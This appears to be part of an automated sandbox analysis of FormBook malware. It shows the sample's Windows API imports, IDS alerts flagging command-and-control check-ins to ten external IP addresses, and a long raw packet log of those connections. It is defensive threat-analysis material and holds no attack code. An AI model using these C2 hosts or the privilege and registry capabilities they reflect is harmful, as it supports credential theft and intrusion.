ADVAPI32.dll: GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll: DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-10T08:48:13.436745+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49736 | 47.57.185.227 | 80 | TCP
2024-09-10T08:48:37.031525+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 89.58.49.1 | 80 | TCP
2024-09-10T08:48:59.099041+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49745 | 154.23.184.240 | 80 | TCP
2024-09-10T08:49:12.745705+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49749 | 85.159.66.93 | 80 | TCP
2024-09-10T08:49:26.732425+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49753 | 185.173.111.76 | 80 | TCP
2024-09-10T08:49:40.352802+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49757 | 203.161.43.228 | 80 | TCP
2024-09-10T08:49:53.716519+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49761 | 161.97.168.245 | 80 | TCP
2024-09-10T08:50:11.450675+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49765 | 172.96.191.39 | 80 | TCP
2024-09-10T08:50:24.780304+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49769 | 104.21.20.125 | 80 | TCP
2024-09-10T08:50:38.980037+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49773 | 43.242.202.169 | 80 | TCP
                      Sep 10, 2024 08:48:50.504894018 CEST8049742154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:50.504975080 CEST4974280192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:50.513559103 CEST4974280192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:50.519783020 CEST8049742154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:51.390253067 CEST8049742154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:51.390268087 CEST8049742154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:51.390450001 CEST4974280192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:52.015990019 CEST4974280192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:53.035397053 CEST4974380192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:53.105740070 CEST8049743154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:53.105835915 CEST4974380192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:53.119609118 CEST4974380192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:53.124553919 CEST8049743154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:54.016617060 CEST8049743154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:54.016904116 CEST8049743154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:54.017136097 CEST4974380192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:54.625478983 CEST4974380192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:55.644197941 CEST4974480192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:55.649507999 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.649605989 CEST4974480192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:55.660487890 CEST4974480192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:55.665456057 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665469885 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665482998 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665494919 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665508032 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665561914 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665648937 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665673018 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:55.665683985 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:56.845432043 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:56.845464945 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:56.845477104 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:56.845541000 CEST4974480192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:56.845750093 CEST8049744154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:56.845853090 CEST4974480192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:57.172156096 CEST4974480192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:58.190184116 CEST4974580192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:58.195139885 CEST8049745154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:58.195223093 CEST4974580192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:58.201013088 CEST4974580192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:58.205847025 CEST8049745154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:59.098756075 CEST8049745154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:59.098772049 CEST8049745154.23.184.240192.168.2.4
                      Sep 10, 2024 08:48:59.099040985 CEST4974580192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:59.101210117 CEST4974580192.168.2.4154.23.184.240
                      Sep 10, 2024 08:48:59.106112003 CEST8049745154.23.184.240192.168.2.4
                      Sep 10, 2024 08:49:04.295238018 CEST4974680192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:04.300024986 CEST804974685.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:04.301851034 CEST4974680192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:04.313524961 CEST4974680192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:04.318314075 CEST804974685.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:05.815412998 CEST4974680192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:05.820835114 CEST804974685.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:05.822280884 CEST4974680192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:06.831406116 CEST4974780192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:06.953232050 CEST804974785.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:06.953336954 CEST4974780192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:06.964118004 CEST4974780192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:06.968936920 CEST804974785.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:08.469130993 CEST4974780192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:08.475068092 CEST804974785.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:08.475197077 CEST4974780192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:09.488605976 CEST4974880192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:09.493592024 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.493663073 CEST4974880192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:09.505068064 CEST4974880192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:09.511969090 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.511990070 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.512001991 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.512012959 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.512092113 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.512103081 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.512114048 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.512243032 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:09.512254953 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:11.015904903 CEST4974880192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:11.021157980 CEST804974885.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:11.021259069 CEST4974880192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:12.035223007 CEST4974980192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:12.040275097 CEST804974985.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:12.042928934 CEST4974980192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:12.050884008 CEST4974980192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:12.056530952 CEST804974985.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:12.745553970 CEST804974985.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:12.745580912 CEST804974985.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:12.745704889 CEST4974980192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:12.748977900 CEST4974980192.168.2.485.159.66.93
                      Sep 10, 2024 08:49:12.753779888 CEST804974985.159.66.93192.168.2.4
                      Sep 10, 2024 08:49:18.199438095 CEST4975080192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:18.204397917 CEST8049750185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:18.204863071 CEST4975080192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:18.214747906 CEST4975080192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:18.219698906 CEST8049750185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:18.882579088 CEST8049750185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:18.883344889 CEST8049750185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:18.883423090 CEST4975080192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:19.719504118 CEST4975080192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:20.738130093 CEST4975180192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:20.892244101 CEST8049751185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:20.892456055 CEST4975180192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:20.907115936 CEST4975180192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:20.912172079 CEST8049751185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:21.558152914 CEST8049751185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:21.558172941 CEST8049751185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:21.558360100 CEST4975180192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:22.422959089 CEST4975180192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:23.445491076 CEST4975280192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:23.450795889 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.450872898 CEST4975280192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:23.460412979 CEST4975280192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:23.465400934 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465415001 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465495110 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465507030 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465529919 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465540886 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465564966 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465576887 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:23.465590954 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:24.122045040 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:24.122065067 CEST8049752185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:24.122127056 CEST4975280192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:24.968985081 CEST4975280192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:25.990811110 CEST4975380192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:26.062251091 CEST8049753185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:26.062799931 CEST4975380192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:26.071441889 CEST4975380192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:26.076987982 CEST8049753185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:26.732014894 CEST8049753185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:26.732372046 CEST8049753185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:26.732424974 CEST4975380192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:26.736284018 CEST4975380192.168.2.4185.173.111.76
                      Sep 10, 2024 08:49:26.741246939 CEST8049753185.173.111.76192.168.2.4
                      Sep 10, 2024 08:49:32.058830023 CEST4975480192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:32.064244032 CEST8049754203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:32.066807985 CEST4975480192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:32.075406075 CEST4975480192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:32.080385923 CEST8049754203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:32.659810066 CEST8049754203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:32.659943104 CEST8049754203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:32.660034895 CEST4975480192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:33.578423023 CEST4975480192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:34.597409964 CEST4975580192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:34.649930954 CEST8049755203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:34.650901079 CEST4975580192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:34.660859108 CEST4975580192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:34.665782928 CEST8049755203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:35.273550987 CEST8049755203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:35.273601055 CEST8049755203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:35.273781061 CEST4975580192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:36.172307968 CEST4975580192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:37.197879076 CEST4975680192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:37.202831030 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.202907085 CEST4975680192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:37.217359066 CEST4975680192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:37.222301960 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222352982 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222383022 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222409010 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222443104 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222493887 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222542048 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222568989 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.222599983 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.875740051 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.875850916 CEST8049756203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:37.877136946 CEST4975680192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:38.719001055 CEST4975680192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:39.737406015 CEST4975780192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:39.742337942 CEST8049757203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:39.742577076 CEST4975780192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:39.748734951 CEST4975780192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:39.753602028 CEST8049757203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:40.352597952 CEST8049757203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:40.352638960 CEST8049757203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:40.352802038 CEST4975780192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:40.359086037 CEST4975780192.168.2.4203.161.43.228
                      Sep 10, 2024 08:49:40.364571095 CEST8049757203.161.43.228192.168.2.4
                      Sep 10, 2024 08:49:45.415704012 CEST4975880192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:45.420607090 CEST8049758161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:45.420674086 CEST4975880192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:45.433249950 CEST4975880192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:45.438301086 CEST8049758161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:46.076337099 CEST8049758161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:46.076385975 CEST8049758161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:46.076417923 CEST8049758161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:46.076494932 CEST4975880192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:46.076494932 CEST4975880192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:46.937786102 CEST4975880192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:47.958842993 CEST4975980192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:47.964045048 CEST8049759161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:47.964673042 CEST4975980192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:47.975758076 CEST4975980192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:47.985965014 CEST8049759161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:48.605144978 CEST8049759161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:48.605168104 CEST8049759161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:48.605186939 CEST8049759161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:48.605334044 CEST4975980192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:49.485007048 CEST4975980192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:50.507038116 CEST4976080192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:50.512051105 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.514807940 CEST4976080192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:50.523171902 CEST4976080192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:50.528122902 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528156042 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528206110 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528233051 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528259993 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528402090 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528453112 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528485060 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:50.528568983 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:51.118318081 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:51.118365049 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:51.118402004 CEST8049760161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:51.118417978 CEST4976080192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:51.118444920 CEST4976080192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:52.033339977 CEST4976080192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:53.052242041 CEST4976180192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:53.091664076 CEST8049761161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:53.091743946 CEST4976180192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:53.101221085 CEST4976180192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:53.108115911 CEST8049761161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:53.716388941 CEST8049761161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:53.716442108 CEST8049761161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:53.716483116 CEST8049761161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:53.716519117 CEST8049761161.97.168.245192.168.2.4
                      Sep 10, 2024 08:49:53.716519117 CEST4976180192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:53.716589928 CEST4976180192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:53.719212055 CEST4976180192.168.2.4161.97.168.245
                      Sep 10, 2024 08:49:53.724016905 CEST8049761161.97.168.245192.168.2.4
                      Sep 10, 2024 08:50:02.871772051 CEST4976280192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:02.876595020 CEST8049762172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:02.876714945 CEST4976280192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:02.898906946 CEST4976280192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:02.903727055 CEST8049762172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:03.793545008 CEST8049762172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:03.794029951 CEST8049762172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:03.794076920 CEST4976280192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:04.409174919 CEST4976280192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:05.426789045 CEST4976380192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:05.431663990 CEST8049763172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:05.431745052 CEST4976380192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:05.444379091 CEST4976380192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:05.449264050 CEST8049763172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:06.364757061 CEST8049763172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:06.364805937 CEST8049763172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:06.366853952 CEST4976380192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:06.953588009 CEST4976380192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:07.972896099 CEST4976480192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:07.977700949 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.985651016 CEST4976480192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:07.991519928 CEST4976480192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:07.996345043 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996355057 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996402025 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996409893 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996424913 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996433020 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996489048 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996556044 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:07.996563911 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:08.902043104 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:08.902076960 CEST8049764172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:08.902137041 CEST4976480192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:09.500484943 CEST4976480192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:10.522826910 CEST4976580192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:10.527874947 CEST8049765172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:10.534822941 CEST4976580192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:10.541189909 CEST4976580192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:10.545986891 CEST8049765172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:11.450560093 CEST8049765172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:11.450592995 CEST8049765172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:11.450675011 CEST4976580192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:11.453550100 CEST4976580192.168.2.4172.96.191.39
                      Sep 10, 2024 08:50:11.458307981 CEST8049765172.96.191.39192.168.2.4
                      Sep 10, 2024 08:50:16.494820118 CEST4976680192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:16.499845982 CEST8049766104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:16.500952959 CEST4976680192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:16.509829044 CEST4976680192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:16.514693022 CEST8049766104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:17.106955051 CEST8049766104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:17.108196974 CEST8049766104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:17.108242989 CEST4976680192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:17.108340979 CEST8049766104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:17.108385086 CEST4976680192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:18.016880035 CEST4976680192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:19.036233902 CEST4976780192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:19.081917048 CEST8049767104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:19.081985950 CEST4976780192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:19.098897934 CEST4976780192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:19.103792906 CEST8049767104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:19.681222916 CEST8049767104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:19.681370020 CEST8049767104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:19.681385040 CEST8049767104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:19.681422949 CEST4976780192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:19.681457996 CEST4976780192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:20.611148119 CEST4976780192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:21.628845930 CEST4976880192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:21.633903027 CEST8049768104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:21.633997917 CEST4976880192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:21.646965027 CEST4976880192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:21.651899099 CEST8049768104.21.20.125192.168.2.4
